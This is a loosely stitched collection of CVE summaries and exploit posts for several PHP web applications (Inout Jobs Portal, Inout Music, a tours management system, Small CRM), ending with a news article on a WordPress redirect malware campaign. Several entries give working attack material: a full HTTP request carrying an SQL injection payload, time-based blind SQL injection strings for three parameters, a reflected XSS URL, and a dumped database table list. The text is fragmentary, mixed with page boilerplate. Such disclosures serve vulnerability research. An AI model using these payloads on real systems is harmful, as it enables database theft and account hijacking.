bloofoxCMS v0.5.2.1 was discovered to contain an arbitrary file deletion vulnerability via the component /include/inc_content_media.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-23151: bloofoxcms Any file deletion · Issue #17 · alexlang24/bloofoxCMS

A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.

**\# Exploit Title: Small CRM — Stored Cross-Site Scripting Vulnerability.  
\# Date: 12-Nov-2022  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:** **https://phpgurukul.com/****\# Software Link:** **https://phpgurukul.com/small-crm-php/****\# Version: 3.0  
\# Tested on: Windows 10  
\# Contact:** **https://www.linkedin.com/in/shivakumar-m-v/**

Stored XSS Vulnerability : Cross-site scripting attacks, also called XSS attacks, are a type of injection attack that injects malicious code into specific input fields. If the inputs fields are not validating or not sanitizing the user input then attacker can run malicious script that runs at server side.

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

**Attack vector:  
**This vulnerability can results attacker injecting the XSS payload in the Subject input Field in “Create Ticket” page and each time user visits the “View Ticket” page, the XSS triggers and the attacker can able to steal the cookie according to the crafted payload.

**Vulnerable Parameter:** Subject.

The Reproducive Steps are given in Video PoC.

**Impact:**

XSS may results to Cookie Stealing, Session Hijacking, Redirection, Account Takeovers and many malicious activities will be performed by perpetrators.

**Mitigations:**

01) Implement Web Application Firewall

02) Configure Security Headers that will validate user input and allow the request.

03) Encode user input wherever possible.

CVE-2022-47073: Stored XSS found in Small CRM (phpgurukul) - Shiva Kumar M V - Medium

A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been classified as critical. Affected is an unknown function of the file user/forget_password.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219336.

POST /otmsp/user/forget\_password.php HTTP/1.1
Host: 192.168.1.12
Content\-Length: 95
Cache\-Control: max-age=0
Upgrade\-Insecure\-Requests: 1
Origin: http://10.100.6.102
Content\-Type: application/x-www-form-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.100.6.102/otmsp/admin/forget\_password.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID\=node0aol8i4yce95t1qdxbkp9f7x0m1.node0; Hm\_lvt\_098e6e84ab585bf0c2e6853604192b8b\=1668679247; Hm\_lpvt\_098e6e84ab585bf0c2e6853604192b8b\=1668679247; Hm\_lvt\_1cd9bcbaae133f03a6eb19da6579aaba\=1672366135; Hm\_lpvt\_1cd9bcbaae133f03a6eb19da6579aaba\=1672387516; PHPSESSID\=ti0mnjh44vnq4oi7noti3i2vq3
Connection: close

email=1' AND GTID\_SUBSET(CONCAT('~',(SELECT DATABASE()),'~'),6055) AND 'uYsm'\='uYsm&send\_email=

CVE-2023-0516: online-tours-travels-management-system/user_forget_password_email.md at main · linmoren/online-tours-travels-management-system

A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/forget_password.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219335.

CVE-2023-0515

phpgurukul Doctor Appointment Management System V 1.0.0 is vulnerable to Cross Site Scripting (XSS) via searchdata=.

\[Suggested description\]

Doctor Appointment Management System V 1.0.0 is vulnerable

\> to Cross Site Scripting (XSS) via searchdata=.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://phpgurukul.com/

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Doctor Appointment Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> searchdata=

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://phpgurukul.com/projects/Doctor-Appointment-System\_PHP.zip

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-46128.

CVE-2022-46128: CVE/2022-46128 at main · Rajeshwar40/CVE

SQL Injection vulnerability in function getTableCreationQuery in CreateAddField.php in phpMyAdmin 5.x before 5.2.0 via the tbl_storage_engine or tbl_collation parameters to tbl_create.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Assignees

Labels

bug

A problem or regression with an existing feature

CVE-2020-22452: sql injection in  /phpmyadmin/libraries/classesCreateAddField.php · Issue #15898 · phpmyadmin/phpmyadmin

Inout Jobs Portal version 2.2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Jobs Portal 2.2.2                                                    ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.website.com/index.php?page=index%2findexyar11%3cimg%20src%3da%20onerror%3dalert(1)%3ex75a9[-] Done

Inout Jobs Portal 2.2.2 Cross Site Scripting

Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Jobs Portal 2.2.2                                                    │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=jobs/searchresult

Method: POST

POST parameter 'loc_id' is vulnerable to SQLI

+-----------------------------------------------------------+

-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="search_query"

web  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

1  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="loc_id"

1[INJECT-HERE]  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="serchtype"

simple  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

0  
-----------------------------245625052541747605171577107419

+-----------------------------------------------------------+

[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.6  
[INFO] fetching tables for database: '*****_jobs_portal'  
Database: *****_jobs_portal  
[53 tables]  
+-----------------------------------------+  
| nesote_inoutscripts_company_ratereview  |  
| nesote_inoutscripts_homepage_banner     |  
| nesote_inoutscripts_users               |  
| nesote_jobportal_admin                  |  
| nesote_jobportal_applied_jobs           |  
| nesote_jobportal_city                   |  
| nesote_jobportal_client_logs            |  
| nesote_jobportal_company_size           |  
| nesote_jobportal_company_type           |  
| nesote_jobportal_companyblock           |  
| nesote_jobportal_contents               |  
| nesote_jobportal_country                |  
| nesote_jobportal_coverletters           |  
| nesote_jobportal_currency               |  
| nesote_jobportal_email_templates        |  
| nesote_jobportal_employer_details       |  
| nesote_jobportal_employer_feedback      |  
| nesote_jobportal_functional_role        |  
| nesote_jobportal_industry               |  
| nesote_jobportal_ip_012023              |  
| nesote_jobportal_ip_022020              |  
| nesote_jobportal_ip_032020              |  
| nesote_jobportal_ip_042020              |  
| nesote_jobportal_ip_082021              |  
| nesote_jobportal_ip_092022              |  
| nesote_jobportal_ip_102022              |  
| nesote_jobportal_ip_112022              |  
| nesote_jobportal_ip_122022              |  
| nesote_jobportal_ipn                    |  
| nesote_jobportal_job_types              |  
| nesote_jobportal_jobs                   |  
| nesote_jobportal_jobseeker_details      |  
| nesote_jobportal_languages              |  
| nesote_jobportal_locations              |  
| nesote_jobportal_messages               |  
| nesote_jobportal_months_messages        |  
| nesote_jobportal_news_and_events        |  
| nesote_jobportal_notifications          |  
| nesote_jobportal_packages               |  
| nesote_jobportal_payment_details        |  
| nesote_jobportal_previous_exp           |  
| nesote_jobportal_qualifications         |  
| nesote_jobportal_resumes                |  
| nesote_jobportal_saved_jobs             |  
| nesote_jobportal_saved_resumes          |  
| nesote_jobportal_seekers_qualifications |  
| nesote_jobportal_sent_jobalerts         |  
| nesote_jobportal_settings               |  
| nesote_jobportal_skills                 |  
| nesote_jobportal_specifications         |  
| nesote_jobportal_states                 |  
| nesote_jobportal_success_story          |  
| nesote_jobportal_themes                 |  
+-----------------------------------------+

[-] Done

Inout Jobs Portal 2.2.2 SQL Injection

Inout Music version 5.1.1 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Music 5.1.1                                                          │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=explore/search

Method: POST

POST parameter 'title' is vulnerable to SQLI

---  
Parameter: title (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV  
---

POST parameter 'genre' is vulnerable to SQLI

---  
Parameter: genre (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10  
---

POST parameter 'country' is vulnerable to SQLI

---  
Parameter: country (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo)  
---

+-----------------------------------------------------------+

POST /index.php?page=explore/search HTTP/2

-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="title"

love[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="type"

audioalbum  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="genre"

1[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="country"

3[Inject-HERE]  
-----------------------------116235583720082436942508111905--

+-----------------------------------------------------------+

[-] Done

Inout Music 5.1.1 SQL Injection

A massive campaign has infected over 4,500 WordPress websites as part of a long-running operation that's been believed to be active since at least 2017.
According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain named "track[.]violetlovelines[.]com" that's designed to redirect visitors to unwanted sites.
The latest operation is

Website Security / WordPress

A massive campaign has infected over 4,500 WordPress websites as part of a long-running operation that's been believed to be active since at least 2017.

According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain named "track\[.\]violetlovelines\[.\]com" that's designed to redirect visitors to unwanted sites.

The latest operation is said to have been active since December 26, 2022, according to data from urlscan.io. A prior wave seen in early December 2022 impacted more than 3,600 sites, while another set of attacks recorded in September 2022 ensnared more than 7,000 sites.

The rogue code is inserted in the WordPress index.php file, with Sucuri noting that it has removed such changes from more than 33,000 files on the compromised sites in the past 60 days.

"In recent months, this malware campaign has gradually switched from the notorious fake CAPTCHA push notification scam pages to black hat 'ad networks' that alternate between redirects to legitimate, sketchy, and purely malicious websites," Sucuri researcher Denis Sinegubko said.

Thus when unsuspecting users land on one of the hacked WordPress sites, a redirect chain is triggered by means of a traffic direction system, landing the victims on pages serving sketchy ads about products that ironically block unwanted ads.

Even more troublingly, the website for one such ad blocker named Crystal Blocker is engineered to display misleading browser update alerts to trick the users into installing its extension depending on the web browser used.

The browser extension is used by nearly 110,000 users spanning Google Chrome (60,000+), Microsoft Edge (40,000+), and Mozilla Firefox (8,635).

"And while the extensions indeed have ad blocking functionality, there is no guarantee that they are safe to use — and may contain undisclosed functions in the current version or in future updates," Sinegubko explained.

Some of the redirects also fall into the outright nefarious category, with the infected websites acting as a conduit for initiating drive-by downloads.

This also includes retrieving from Discord CDN an information-stealing malware known as Raccoon Stealer, which is capable of plundering sensitive data such as passwords, cookies, autofill data from browsers, and crypto wallets.

The findings come as threat actors are setting up lookalike websites for a variety of legitimate software to distribute stealers and trojans through malicious ads in Google search results.

Google has since stepped in to block one of the rogue domains involved in the redirect scheme, classifying it as an unsafe site that installs "unwanted or malicious software on visitors' computers."

To mitigate such threats, WordPress site owners are advised to change passwords and update installed themes and plugins as well as remove those that are unused or abandoned by their developers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#php